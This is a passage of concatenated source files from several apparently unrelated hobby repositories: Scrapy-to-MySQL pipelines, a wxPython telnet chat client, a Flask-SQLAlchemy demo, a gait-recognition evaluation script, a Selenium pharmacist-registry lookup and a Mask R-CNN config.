self.dbpool = adbapi.ConnectionPool('pymysql', **dbparams)
def process_item(self, item, spider):
if spider.name is not 'jdspider':
return item
# 使用twisted将MySQL插入变成异步执行。通过连接池执行具体的sql操作,返回一个对象
query = self.dbpool.runInteraction(self.do_insert, item)
# 添加异常处理
query.addCallback(self.handle_error)
return item
def do_insert(self, cursor, item):
sql = ''
values = []
if isinstance(item, JingDongDataItem):
sql = '''
insert into jd_t (title, price, sku_id, deatilurl, commentsnum) values (%s, %s, %s, %s, %s)
'''
values = (item['title'], item['price'], item['sku_id'], item['deatilurl'], item['commentsnum'])
elif isinstance(item, JdCommentsItem):
sql = '''
insert into jd_comment_t (sku_id, content, creationTime, productColor, productSize) values (%s, %s, %s, %s, %s)
'''
values = (item['sku_id'], item['content'], item['creationTime'], item['productColor'], item['productSize'])
else:
return item
# print('*' * 30)
# print(sql)
cursor.execute(sql, values)
def handle_error(self, failure):
if failure:
print(failure)
class lwTianMaoPipelines(object):
def __init__(self):
dbparams = {
'host': '127.0.0.1',
'port': 3306,
'user': 'root',
'password': '<PASSWORD>',
'database': 'lwqdata',
'charset': 'utf8',
'cursorclass': cursors.DictCursor
}
self.dbpool = adbapi.ConnectionPool('pymysql', **dbparams)
def process_item(self, item, spider):
if spider.name is not 'tianmaospider':
return item
# 使用twisted将MySQL插入变成异步执行。通过连接池执行具体的sql操作,返回一个对象
query = self.dbpool.runInteraction(self.do_insert, item)
# 添加异常处理
query.addCallback(self.handle_error)
return item
def do_insert(self, cursor, item):
sql = '''
insert into tianmao_t (title, sales, price, shopname) values (%s, %s, %s, %s)
'''
values = (item['title'], item['sales'], item['price'], item['shopname'])
# print('*' * 30)
# print(sql)
cursor.execute(sql, values)
def handle_error(self, failure):
if failure:
print(failure)
class ImagesnamePipelines(ImagesPipeline):
# 1看源码可以知道,这个方法只是遍历出我们指定的图片字段,是个数组,然后一个一个请求
def get_media_requests(self, item, info):
if isinstance(item, MedicaldataItem):
# 循环每一张图片地址下载,若传过来的不是集合则无需循环直接yield
for imageurl in item['image_url']:
print('imagepipelines.imageurl:')
print(imageurl)
# meta里面的数据是从spider获取,然后通过meta传递给下面方法:file_path
yield Request(imageurl, meta={'name': item['image_name']})
else:
return item
# 2重命名,若不重写这函数,图片名为哈希,就是一串乱七八糟的名字
def file_path(self, request, response=None, info=None):
filename = request.meta['name']
# 注意,需要拼接后缀,不然文件格式不是图片,无法打开
return filename+'.jpg'
#3这个是请求完成之后走的方法,我们可以得到请求的url和存放的地址
def item_completed(self, results, item, info):
pass
def lwstring(self, str):
return pymysql.escape_string(str)
class LwscrapyPipeline(object):
# def __init__(self,):
# self.conn = pymysql.connect(host='127.0.0.1',
# port=3306,
# user='root',
# passwd='<PASSWORD>',
# db='medicaldata',
# charset='utf8',
# use_unicode = True)
# self.cursor = self.conn.cursor()
#
# # 必需函数
# def process_item(self, item, spider):
# # print(item)
# sql = '''
# insert into medicaldata_t (name, company, deatil_url, approval_num, related_disease, func,image_url,image_name) values (%s, %s, %s, %s, %s, %s, %s, %s) ON duplicate key update name = values(name)
# '''
# function = self.conn.escape_string(item['function'])
# # print('function:'+function)
# # function = function.replace('\u200b', '')
# # print('function:' + function)
# values = (item['name'], item['company'], item['deatil_url'], item['approval_num'], item['related_disease'], function, item['image_url'][0], item['image_name'])
# # print(sql)
# print(values)
# self.cursor.execute(sql, values)
# self.conn.commit()
#
# # 返回是为了把数据传给下一个管道
# return item
#
# def close_spider(self, spider):
# self.cursor.close()
# self.conn.close()
# 采用异步数据库连接池的方法
def __init__(self):
dbparams = {
'host': '127.0.0.1',
'port': 3306,
'user': 'root',
'password': '<PASSWORD>',
'database': 'medicaldata',
'charset': 'utf8',
'cursorclass': cursors.DictCursor
}
self.dbpool = adbapi.ConnectionPool('pymysql', **dbparams)
# self._sql = None
# @property
# def sql(self):
# if not self._sql:
# self.sql = '''
# insert into medicaldata_t (name, company, deatil_url, approval_num, related_disease, func,image_url,image_name) values (%s, %s, %s, %s, %s, %s, %s, %s) ON duplicate key update name = values(name)
# '''
# return self._sql
# return self._sql
# @classmethod
# def form_settings(cls, settings):
#
# adbparams = dict(
# host=settings('MYSQL_HOST'),
# database=settings("MYSQL_DATABASE"),
# user=settings("MYSQL_USER"),
# password=settings("<PASSWORD>"),
# port=settings("MYSQL_PORT"),
# cursorclass=pymysql.cursors.DictCursor, #指定cursor类型
# )
# # 连接数据池ConnectionPool,使用pymysql或者Mysqldb连接
# dbpool = adbapi.ConnetionPool('pymysql', **adbparams)
#
# return cls(dbpool)
# def open_spider(self, spider):
# self.db = pymysql.connect(self.host, self.user, self.password,self.database, charset='utf8', port=self.port)
# print('*'*10+'open')
# print(self.db)
# self.cursor = self.db.cursor()
#
# def close_spider(self, spider):
# print('*'*10+'close')
# self.cursor.close()
# self.db.close()
def process_item(self, item, spider):
if spider.name is not 'lw_medicaldataspider':
return item
# 使用twisted将MySQL插入变成异步执行。通过连接池执行具体的sql操作,返回一个对象
query = self.dbpool.runInteraction(self.do_insert, item)
# 添加异常处理
query.addCallback(self.handle_error)
return item
def do_insert(self, cursor, item):
sql = '''
insert into medicaldata_t (name, company, deatil_url, approval_num, related_disease, func,image_url,image_name) values (%s, %s, %s, %s, %s, %s, %s, %s) ON duplicate key update name = values(name)
'''
values = (item['name'], item['company'], item['deatil_url'], item['approval_num'], item['related_disease'], item['function'], item['image_url'][0], item['image_name'])
print('*' * 30)
print(sql)
cursor.execute(sql, values)
def handle_error(self, failure):
if failure:
print(failure)
```
#### File: lwscrapy/spiders/renren.py
```python
import scrapy
class RenrenSpider(scrapy.Spider):
name = 'renren'
allowed_domains = ['renren.com', 'httpbin.org/user-agent', 'www.baidu.com']
start_urls = ['http://renren.com/']
# 重写 自定义开始请求
# def start_requests(self):
# url = 'http://www.renren.com/PLogin.do'
# data = {'email': '<EMAIL>',
# 'password': '<PASSWORD>'}
# request = scrapy.FormRequest(url=url, formdata=data, callback=self.login_prase)
# yield request
#
# def login_prase(self, response):
# print(response.text)
# with open('login_res.html', 'w', encoding='utf-8') as ft:
# ft.write(response.text)
# 测试 动态请求头
def start_requests(self):
# url = 'httpbin.org/user-agent'
url = 'http://www.baidu.com'
request = scrapy.Request(url = url, callback = self.res_prase)
yield request
def res_prase(self,response):
print(response.text)
``` |
{
"source": "13659831387/RoomSpeech",
"score": 2
} |
#### File: 13659831387/RoomSpeech/client.py
```python
import wx
import telnetlib
from time import sleep
import _thread as thread
from chatbot import baidu_api2, chatbot, tuling, play_mp3, remove_voice, getText
from config import BOT, default_server, VOICE_SWITCH
from recorder import *
import threading
bot_use = BOT
class LoginFrame(wx.Frame):
"""
登录窗口
"""
def __init__(self, parent, id, title, size):
# 初始化,添加控件并绑定事件
wx.Frame.__init__(self, parent, id, title)
self.SetSize(size)
self.Center()
self.serverAddressLabel = wx.StaticText(self, label="Server Address", pos=(15, 40), size=(120, 25))
self.userNameLabel = wx.StaticText(self, label="UserName", pos=(45, 90), size=(120, 25))
self.serverAddress = wx.TextCtrl(self, value=default_server,
pos=(120, 37), size=(150, 25), style=wx.TE_PROCESS_ENTER)
self.userName = wx.TextCtrl(self, pos=(120, 87), size=(150, 25), style=wx.TE_PROCESS_ENTER)
self.loginButton = wx.Button(self, label='Login', pos=(50, 145), size=(90, 30))
self.exitButton = wx.Button(self, label='Exit', pos=(180, 145), size=(90, 30))
# 绑定登录方法
self.loginButton.Bind(wx.EVT_BUTTON, self.login)
# 绑定退出方法
self.exitButton.Bind(wx.EVT_BUTTON, self.exit)
# 服务器输入框Tab事件
self.serverAddress.SetFocus()
self.Bind(wx.EVT_TEXT_ENTER, self.usn_focus, self.serverAddress)
# 用户名回车登录
self.Bind(wx.EVT_TEXT_ENTER, self.login, self.userName)
self.Show()
# 回车调到用户名输入栏
def usn_focus(self, event):
self.userName.SetFocus()
def login(self, event):
# 登录处理
try:
serverAddress = self.serverAddress.GetLineText(0).split(':')
con.open(serverAddress[0], port=int(serverAddress[1]), timeout=10)
response = con.read_some()
if response != b'Connect Success':
self.showDialog('Error', 'Connect Fail!', (200, 100))
return
con.write(('login ' + str(self.userName.GetLineText(0)) + '\n').encode("utf-8"))
response = con.read_some()
if response == b'UserName Empty':
self.showDialog('Error', 'UserName Empty!', (200, 100))
elif response == b'UserName Exist':
self.showDialog('Error', 'UserName Exist!', (200, 100))
else:
self.Close()
ChatFrame(None, 2, title='当前用户:'+str(self.userName.GetLineText(0)), size=(515, 400))
except Exception:
self.showDialog('Error', 'Connect Fail!', (95, 20))
def exit(self, event):
self.Close()
# 显示错误信息对话框
def showDialog(self, title, content, size):
dialog = wx.Dialog(self, title=title, size=size)
dialog.Center()
wx.StaticText(dialog, label=content)
dialog.ShowModal()
class ChatFrame(wx.Frame):
"""
聊天窗口
"""
def __init__(self, parent, id, title, size):
# 初始化,添加控件并绑定事件
wx.Frame.__init__(self, parent, id, title, style=wx.SYSTEM_MENU | wx.CAPTION | wx.CLOSE_BOX |
wx.DEFAULT_FRAME_STYLE)
self.SetSize(size)
self.Center()
self.chatFrame = wx.TextCtrl(self, pos=(5, 5), size=(490, 310), style=wx.TE_MULTILINE | wx.TE_READONLY)
self.sayButton = wx.Button(self, label="Say", pos=(5, 320), size=(58, 25))
self.message = wx.TextCtrl(self, pos=(65, 320), size=(240, 25), style=wx.TE_PROCESS_ENTER)
self.sendButton = wx.Button(self, label="Send", pos=(310, 320), size=(58, 25))
self.usersButton = wx.Button(self, label="Users", pos=(373, 320), size=(58, 25))
self.closeButton = wx.Button(self, label="Close", pos=(436, 320), size=(58, 25))
self.sendButton.Bind(wx.EVT_BUTTON, self.send) # 发送按钮绑定发送消息方法
self.message.SetFocus() # 输入框回车焦点
self.sayButton.Bind(wx.EVT_LEFT_DOWN, self.sayDown) # SAY按钮按下
self.sayButton.Bind(wx.EVT_LEFT_UP, self.sayUp) # Say按钮弹起
self.Bind(wx.EVT_TEXT_ENTER, self.send, self.message) # 回车发送消息
self.usersButton.Bind(wx.EVT_BUTTON, self.lookUsers) # Users按钮绑定获取在线用户数量方法
self.closeButton.Bind(wx.EVT_BUTTON, self.close) # 关闭按钮绑定关闭方法
treceive = threading.Thread(target=self.receive) # 接收信息线程
treceive.start()
self.ShowFullScreen(True) # 全屏
self.Show()
def sayDown(self, event):
trecording = threading.Thread(target=recording)
trecording.start()
def sayUp(self, event):
sayText = getText(r"E:\speechRoom\voice_say\say_voice.wav")
self.message.AppendText(str(sayText))
self.send(self)
def send(self, event):
# 发送消息
message = str(self.message.GetLineText(0)).strip()
global bot_use
if message != '':
if message == "chatbot":
bot_use = "ChatBot"
self.message.Clear()
con.write(('noone_say You have been changed ChatBot-Chat' + '\n').encode("utf-8"))
return
elif message == "tuling":
bot_use = "TuLing"
self.message.Clear()
con.write(('noone_say You have been changed TuLing-Chat' + '\n').encode("utf-8"))
return
elif message == "user":
bot_use = "User"
self.message.Clear()
con.write(('noone_say You have been changed User-Chat' + '\n').encode("utf-8"))
return
con.write(('say ' + message + '\n').encode("utf-8"))
self.message.Clear()
# 机器人回复
if bot_use == "ChatBot":
answer = chatbot(message)
con.write(('chatbot_say ' + answer + '\n').encode("utf-8"))
elif bot_use == "TuLing":
answer = tuling(message)
con.write(('tuling_say ' + answer + '\n').encode("utf-8"))
elif bot_use == "User":
return
if VOICE_SWITCH:
# 写本地音乐文件
baidu_api2(answer)
# 新建线程播放音乐
tplay_mp3 = threading.Thread(target=play_mp3)
tplay_mp3.start()
# thread.start_new_thread(play_mp3, ())
return
def lookUsers(self, event):
# 查看当前在线用户
con.write(b'look\n')
def close(self, event):
# 关闭窗口
tremove_voice = threading.Thread(target=remove_voice)
tremove_voice.start()
# thread.start_new_thread(remove_voice, ())
con.write(b'logout\n')
con.close()
self.Close()
def receive(self):
# 接受服务器的消息
while True:
sleep(1)
result = con.read_very_eager()
if result != '':
self.chatFrame.AppendText(result)
def saytime(self):
i = 0
while True:
self.chatFrame.AppendText('正在录音...' + str(i) + '秒\n')
sleep(1)
i = i + 1
if __name__ == '__main__':
app = wx.App()
con = telnetlib.Telnet()
LoginFrame(None, -1, title="Login", size=(320, 250))
app.MainLoop()
``` |
{
"source": "1366560t/helloflask",
"score": 2
} |
#### File: demos/database/app.py
```python
import os
import sys
import click
from flask import Flask
from flask import redirect, url_for, abort, render_template, flash
from flask_sqlalchemy import SQLAlchemy
from flask_wtf import FlaskForm
from wtforms import SubmitField, TextAreaField
from wtforms.validators import DataRequired
# sqlite URI compatible
WIN = sys.platform.startswith('win')
if WIN: # 在Windows系统下的URI中的斜线数量为3个
prefix = 'sqlite:///'
else: # SQLite的数据库URI在Linux或macOS系统下的斜线数量是4个
prefix = 'sqlite:////'
app = Flask(__name__)
app.jinja_env.trim_blocks = True
app.jinja_env.lstrip_blocks = True
app.config['SECRET_KEY'] = os.getenv('SECRET_KEY', 'secret string')
# 数据库的URI通过配置变量SQLALCHEMY_DATABASE_URI设置
# 用app.root_path来定位数据库文件的路径,并将数据库文件命名为data.db
app.config['SQLALCHEMY_DATABASE_URI'] = os.getenv('DATABASE_URL', prefix + os.path.join(app.root_path, 'data.db'))
# 事件通知系统 决定是否追踪对象的修改
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)
# handlers
@app.shell_context_processor
def make_shell_context():
return dict(db=db, Note=Note, Author=Author, Article=Article, Writer=Writer, Book=Book,
Singer=Singer, Song=Song, Citizen=Citizen, City=City, Capital=Capital,
Country=Country, Teacher=Teacher, Student=Student, Post=Post, Comment=Comment, Draft=Draft)
@app.cli.command() # 自定义flask命令
@click.option('--drop', is_flag=True, help='Create after drop.')
def initdb(drop):
"""Initialize the database.初始化数据库"""
if drop:
db.drop_all() # 调用db.drop_all()方法删除数据库和表
db.create_all() # 调用db.create_all()方法创建
click.echo('Initialized database.')
# Forms
class NewNoteForm(FlaskForm):
body = TextAreaField('Body', validators=[DataRequired()])
submit = SubmitField('Save')
class EditNoteForm(FlaskForm):
body = TextAreaField('Body', validators=[DataRequired()])
submit = SubmitField('Update')
class DeleteNoteForm(FlaskForm):
submit = SubmitField('Delete')
# Models 定义Note模型
class Note(db.Model):
# 表的字段(列)由db.Column类的实例表示 db.Integer的id字段 存储整型
id = db.Column(db.Integer, primary_key=True)
# 类型为db.Text的body列 存储文本
body = db.Column(db.Text)
# optional 可选的 __repr__()方法会返回一条类似“<模型类名主键值>”的字符串
def __repr__(self):
return '<Note %r>' % self.body
@app.route('/')
def index():
form = DeleteNoteForm()
notes = Note.query.all()
return render_template('index.html', notes=notes, form=form)
@app.route('/new', methods=['GET', 'POST'])
def new_note():
form = NewNoteForm()
if form.validate_on_submit():
body = form.body.data
note = Note(body=body)
db.session.add(note)
db.session.commit()
flash('Your note is saved.')
return redirect(url_for('index'))
return render_template('new_note.html', form=form)
@app.route('/edit/<int:note_id>', methods=['GET', 'POST'])
def edit_note(note_id):
form = EditNoteForm()
note = Note.query.get(note_id)
if form.validate_on_submit():
note.body = form.body.data
db.session.commit()
flash('Your note is updated.')
return redirect(url_for('index'))
form.body.data = note.body # preset form input's value
return render_template('edit_note.html', form=form)
@app.route('/delete/<int:note_id>', methods=['POST'])
def delete_note(note_id):
form = DeleteNoteForm()
if form.validate_on_submit():
note = Note.query.get(note_id)
db.session.delete(note)
db.session.commit()
flash('Your note is deleted.')
else:
abort(400)
return redirect(url_for('index'))
# one to many
class Author(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(20), unique=True)
phone = db.Column(db.String(20))
articles = db.relationship('Article') # collection
def __repr__(self):
return '<Author %r>' % self.name
class Article(db.Model):
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String(50), index=True)
body = db.Column(db.Text)
author_id = db.Column(db.Integer, db.ForeignKey('author.id'))
def __repr__(self):
return '<Article %r>' % self.title
# many to one
class Citizen(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(70), unique=True)
city_id = db.Column(db.Integer, db.ForeignKey('city.id'))
city = db.relationship('City') # scalar
def __repr__(self):
return '<Citizen %r>' % self.name
class City(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(30), unique=True)
def __repr__(self):
return '<City %r>' % self.name
# one to one
class Country(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(30), unique=True)
capital = db.relationship('Capital', uselist=False) # collection -> scalar
def __repr__(self):
return '<Country %r>' % self.name
class Capital(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(30), unique=True)
country_id = db.Column(db.Integer, db.ForeignKey('country.id'))
country = db.relationship('Country') # scalar
def __repr__(self):
return '<Capital %r>' % self.name
# many to many with association table
association_table = db.Table('association',
db.Column('student_id', db.Integer, db.ForeignKey('student.id')),
db.Column('teacher_id', db.Integer, db.ForeignKey('teacher.id'))
)
class Student(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(70), unique=True)
grade = db.Column(db.String(20))
teachers = db.relationship('Teacher',
secondary=association_table,
back_populates='students') # collection
def __repr__(self):
return '<Student %r>' % self.name
class Teacher(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(70), unique=True)
office = db.Column(db.String(20))
students = db.relationship('Student',
secondary=association_table,
back_populates='teachers') # collection
def __repr__(self):
return '<Teacher %r>' % self.name
# one to many + bidirectional relationship
class Writer(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(64), unique=True)
books = db.relationship('Book', back_populates='writer')
def __repr__(self):
return '<Writer %r>' % self.name
class Book(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(50), index=True)
writer_id = db.Column(db.Integer, db.ForeignKey('writer.id'))
writer = db.relationship('Writer', back_populates='books')
def __repr__(self):
return '<Book %r>' % self.name
# one to many + bidirectional relationship + use backref to declare bidirectional relationship
class Singer(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(70), unique=True)
songs = db.relationship('Song', backref='singer')
def __repr__(self):
return '<Singer %r>' % self.name
class Song(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(50), index=True)
singer_id = db.Column(db.Integer, db.ForeignKey('singer.id'))
def __repr__(self):
return '<Song %r>' % self.name
# cascade
class Post(db.Model):
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String(50))
body = db.Column(db.Text)
comments = db.relationship('Comment', back_populates='post', cascade='all, delete-orphan') # collection
class Comment(db.Model):
id = db.Column(db.Integer, primary_key=True)
body = db.Column(db.Text)
post_id = db.Column(db.Integer, db.ForeignKey('post.id'))
post = db.relationship('Post', back_populates='comments') # scalar
# event listening
class Draft(db.Model):
id = db.Column(db.Integer, primary_key=True)
body = db.Column(db.Text)
edit_time = db.Column(db.Integer, default=0)
@db.event.listens_for(Draft.body, 'set')
def increment_edit_time(target, value, oldvalue, initiator):
if target.edit_time is not None:
target.edit_time += 1
# same with:
# @db.event.listens_for(Draft.body, 'set', named=True)
# def increment_edit_time(**kwargs):
# if kwargs['target'].edit_time is not None:
# kwargs['target'].edit_time += 1
``` |
{
"source": "136823xuewei/gait-recognition",
"score": 2
} |
#### File: gait-recognition/classification/casiab_performance.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from matplotlib import pyplot as plt
import tensorflow as tf
import seaborn as sb
import pandas as pd
import numpy as np
import math
import time
import cv2
import os
tf.reset_default_graph()
gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.85)
sess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options))
# tip: if you run into problems with TensorBoard
# clear the contents of this directory, re-run this script
# then restart TensorBoard to see the result
# LOGDIR = './graphs'
model_frames = 64
NUM_CLASSES = 74
NUM_PIXELS = 88 * 128
TRAIN_STEPS = 0
BATCH_SIZE = 1 << 5
MODEL_ANGLE_DICT = {'000': True, '018': False, '036': False, '054': False, '072': False, '090': False, '108': False, '126': False, '144': False, '162': False, '180': False}
TEST_ANGLE_DICT = {'000': False, '018': False, '036': False, '054': True, '072': False, '090': False, '108': False, '126': False, '144': False, '162': False, '180': False}
LEARNING_RATE = 1e-4
DATA_PATH = 'Generated_full_data_GEI'
start_time = time.time()
keep_prob = 0.5 #dropout (keep probability)
def del_files(path):
for root, dirs, files in os.walk(path):
for name in files:
if name.startswith("."):
os.remove(os.path.join(root, name))
print("Delete File: " + os.path.join(root, name))
def get_label(_index, num_classes):
# label = np.zeros(shape=[num_classes], dtype='float32')
# label[int(_index) - 1] = 1
# return label
return (int(_index) - 1)
def load_images_from_folder(folder, model_angle_dict, test_angle_dict):
train_frames = []
train_labels = []
probe_frames = []
probe_labels = []
for i in xrange(11):
train_frames.append([])
for i in xrange(11):
train_labels.append([])
for i in xrange(11):
probe_frames.append([])
for i in xrange(11):
probe_labels.append([])
for human_id in os.listdir(os.path.join(folder, 'train')):
if int(human_id) < 74:
continue
for angle in os.listdir(os.path.join(folder, 'train', human_id)):
# if not model_angle_dict[angle]:
# continue
for _type in os.listdir(os.path.join(folder, 'train', human_id, angle)):
img = cv2.imread(os.path.join(folder, 'train', human_id, angle, _type), 0)
if img is not None:
train_frames[int(angle) // 18].append(img.flatten())
train_labels[int(angle) // 18].append(get_label(human_id, 124))
for human_id in os.listdir(os.path.join(folder, 'test')):
for angle in os.listdir(os.path.join(folder, 'test', human_id)):
# if not test_angle_dict[angle]:
# continue
for _type in os.listdir(os.path.join(folder, 'test', human_id, angle)):
img = cv2.imread(os.path.join(folder, 'test', human_id, angle, _type), 0)
if img is not None:
probe_frames[int(angle) // 18].append(img.flatten())
probe_labels[int(angle) // 18].append(get_label(human_id, 124))
return (train_frames, train_labels, probe_frames, probe_labels)
del_files(DATA_PATH)
(train_frames, train_labels, probe_frames, probe_labels) = load_images_from_folder(DATA_PATH, MODEL_ANGLE_DICT, TEST_ANGLE_DICT)
# Define inputs
with tf.name_scope('input'):
images = tf.placeholder(tf.float32, [None, NUM_PIXELS], name="pixels")
labels = tf.placeholder(tf.float32, [None, NUM_CLASSES], name="labels")
# dropout_prob = tf.placeholder_with_default(1.0, shape=())
# Create some wrappers for simplicity
def conv2d(x, W, b, strides=1):
# Conv2D wrapper, with bias and relu activation
x = tf.nn.conv2d(x, W, strides=[1, strides, strides, 1], padding='SAME')
x = tf.nn.bias_add(x, b)
return tf.nn.relu(x)
def maxpool2d(x, k=2):
# MaxPool2D wrapper
return tf.nn.max_pool(x, ksize=[1, k, k, 1], strides=[1, 2, 2, 1],
padding='SAME')
# Create model
def conv_net(x, weights, biases, dropout):
# Reshape input picture
x = tf.reshape(x, shape=[-1, 128, 88, 1])
# Convolution Layer
conv1 = conv2d(x, weights['wc1'], biases['bc1'])
# Max Pooling (down-sampling)
conv1 = maxpool2d(conv1, k=2)
conv1 = tf.contrib.layers.batch_norm(conv1)
# Convolution Layer
conv2 = conv2d(conv1, weights['wc2'], biases['bc2'])
# Max Pooling (down-sampling)
conv2 = maxpool2d(conv2, k=3)
conv2 = tf.contrib.layers.batch_norm(conv2)
# Fully connected layer
# Reshape conv2 output to fit fully connected layer input
fc3 = tf.reshape(conv2, [-1, weights['wd1'].get_shape().as_list()[0]])
fc3 = tf.add(tf.matmul(fc3, weights['wd1']), biases['bd1'])
fc3 = tf.nn.relu(fc3)
# Apply Dropout
# fc1 = tf.nn.dropout(fc1, dropout)
# fc3 = tf.nn.dropout(fc3, dropout_prob)
# # Output, class prediction
fc4 = tf.add(tf.matmul(fc3, weights['fc4']), biases['fc4'])
return fc3
# Store layers weight & bias
initializer = tf.contrib.layers.xavier_initializer()
weights = {
# 7x7 conv, 1 input, 18 outputs
'wc1': tf.Variable(initializer([7, 7, 1, 18])),
# 5x5 conv, 18 inputs, 45 outputs
'wc2': tf.Variable(initializer([5, 5, 18, 45])),
# fully connected, 7*7*64 inputs, 1024 outputs
'wd1': tf.Variable(initializer([32*22*45, 1024])),
# # 1024 inputs, 10 outputs (class prediction)
'fc4': tf.Variable(initializer([1024, NUM_CLASSES]))
}
biases = {
'bc1': tf.Variable(tf.random_normal([18])),
'bc2': tf.Variable(tf.random_normal([45])),
'bd1': tf.Variable(tf.random_normal([1024])),
'fc4': tf.Variable(tf.random_normal([NUM_CLASSES]))
}
y = conv_net(images, weights, biases, keep_prob)
sess.run(tf.global_variables_initializer())
saver = tf.train.Saver()
saver.restore(sess, "./full_tri_model/model.ckpt")
print("%d frames model restored."%model_frames)
print(' ', end=',')
for i in xrange(11):
print('%4d'%(i * 18), end=',')
print_map = np.zeros(shape=(11, 11), dtype=np.float32)
gallery_encoding = []
probe_encoding = []
for a in range(11):
gallery_encoding.append(sess.run(y, feed_dict={images: train_frames[a]}))
for a in range(11):
probe_encoding.append(sess.run(y, feed_dict={images: probe_frames[a]}))
for a in range(11):
print('')
print('%3d'%(a * 18), end=',')
for b in range(11):
simlarity = np.zeros(shape=[len(probe_encoding[b]), len(gallery_encoding[a])], dtype=np.float32)
pred_label = np.zeros(shape=[len(probe_encoding[b])], dtype=np.int)
for i in range(len(probe_encoding[b])):
for j in range(len(gallery_encoding[a])):
simlarity[i][j] = np.exp(-(((probe_encoding[b][i] - gallery_encoding[a][j])/1024.0)**2).sum())
# import pdb
# pdb.set_trace()
tmp_index = simlarity[i].argmax()
pred_label[i] = train_labels[a][tmp_index]
# if not (pred_label[i] == probe_labels[i]):
# print(str((pred_label[i] == probe_labels[i])) + ' ' + str(pred_label[i]) + ' ' + str(probe_labels[i]))
acc = np.sum(pred_label[:] == probe_labels[b][:])
# print_map[b][10 - a] = 100.0 * acc/(len(probe_labels[b])*1.0)
print_map[b][a] = 100.0 * acc/(len(probe_labels[b])*1.0)
print('%.2f'%(100.0 * acc/(len(probe_labels[b])*1.0)), end=',')
print(print_map)
grid_visualization = np.array(print_map.transpose())
grid_visualization.shape = (11, 11)
sb.heatmap(grid_visualization, cmap='Oranges')
plt.xticks(np.arange(11) + 0.5, xrange(0, 181, 18))
plt.yticks(np.arange(11) + 0.5, xrange(180, -1, -18))
plt.xlabel('Gallery Angle')
plt.ylabel('Probe Angle')
plt.show()
``` |
{
"source": "136s/check_pharmacist",
"score": 3
} |
#### File: 136s/check_pharmacist/check_pharmacist.py
```python
import time
import pandas as pd
from selenium import webdriver
SEARCH_URL = "https://licenseif.mhlw.go.jp/search_iyaku/top.jsp"
SLEEP_SEC = 3
IN_CSV_NAME = "./list.csv"
OUT_CSV_NAME = "./output.csv"
# 名前を投げると「登録年」の list が返ってくる
def get_years(name) :
driver.get(SEARCH_URL)
time.sleep(SLEEP_SEC)
search_box = driver.find_element_by_name("name")
search_box.send_keys(name)
search_box.submit()
regi = driver.find_elements_by_class_name('REGISTRATION_TD')
years = []
for r in regi:
years.append(r.text)
return years
# csv は name, years カラムの 2 行からなる(ヘッダー付き)
df = pd.read_csv(IN_CSV_NAME)
df["years"] = df["years"].astype(str)
driver = webdriver.Chrome()
for i, _ in df.iterrows():
result = get_years(df.at[i, "name"])
df.at[i, "years"] = " ".join(result) # スペース区切りで格納
driver.quit()
df.to_csv(open(OUT_CSV_NAME, "w", encoding="utf_8_sig", newline=""), index=False)
``` |
{
"source": "1371164370/IC3Net",
"score": 3
} |
#### File: IC3Net/web/json_process.py
```python
import os
import json
import sys
SIMPLE_SPREAD=0
TRAFFIC_JUNCTION=1
# 遍历得到文件夹下的所有文件
class AllFile:
def __init__(self,path) -> None:
self.path=path
def get_file_list(self):
file_list =[]
self.__file_in_dir_iter(self.path,file_list)
return file_list
def __file_in_dir_iter(self,path,file_list):
for name in os.listdir(path):
p = os.path.join(path, name)
if os.path.isfile(p):
file_list.append(p)
else:
self.__file_in_dir_iter(p,file_list)
def refresh_param(game,key,value):
'''
example -- refresh_param(SIMPLE_SPREAD,"--load",AllFile("models").get_file_list())
key -- 参数名
value -- 列表
'''
with open('./web/static/source/data/game_param.json') as f:
data=json.load(f)
with open('./web/static/source/data/game_param.json','w') as f:
data["games"][game]["params"][key]=value
json.dump(data,f,indent=4)
``` |
{
"source": "1371174718/Mask_RCNN_master",
"score": 3
} |
#### File: compute_map/shapes/compute_map.py
```python
from shapes import *
import numpy as np
import matplotlib.pyplot as plt
# Root directory of the project
ROOT_DIR = os.path.abspath("../../")
# Import Mask RCNN
sys.path.append(ROOT_DIR) # To find local version of the library
from mrcnn.config import Config
from mrcnn import utils
import mrcnn.model as modellib
from mrcnn import visualize
from mrcnn.model import log
# %matplotlib inline
# Directory to save logs and trained model
MODEL_DIR = os.path.join(ROOT_DIR, "logs")
# %%
class BalloonConfig(Config):
"""Configuration for training on the toy dataset.
Derives from the base Config class and overrides some values.
"""
# Give the configuration a recognizable name
NAME = "version"
# We use a GPU with 12GB memory, which can fit two images.
# Adjust down if you use a smaller GPU.
IMAGES_PER_GPU = 1
# Number of classes (including background)
NUM_CLASSES = 1 + 1 # Background + balloon
# Number of training steps per epoch
STEPS_PER_EPOCH = 1
VALIDATION_STEPS = 1
# Skip detections with < 90% confidence
DETECTION_MIN_CONFIDENCE = 0.9
IMAGE_MIN_DIM = 512
IMAGE_MAX_DIM = 640
config = BalloonConfig()
config.display()
# %%
def get_ax(rows=1, cols=1, size=8):
"""Return a Matplotlib Axes array to be used in
all visualizations in the notebook. Provide a
central point to control graph sizes.
Change the default size attribute to control the size
of rendered images
"""
_, ax = plt.subplots(rows, cols, figsize=(size * cols, size * rows))
return ax
def data_split(full_list, ratio, shuffle=False):
n_total = len(full_list)
offset = int(n_total * ratio)
if n_total == 0 or offset < 1:
return [], full_list
if shuffle:
random.shuffle(full_list)
sublist_1 = full_list[:offset]
sublist_2 = full_list[offset:]
return sublist_1, sublist_2
from pathlib import Path
config = BalloonConfig()
dataset_root_path = r'E:\GitHub_Projects\Mask_RCNN_master\samples\compute_map\saveImgFiles'
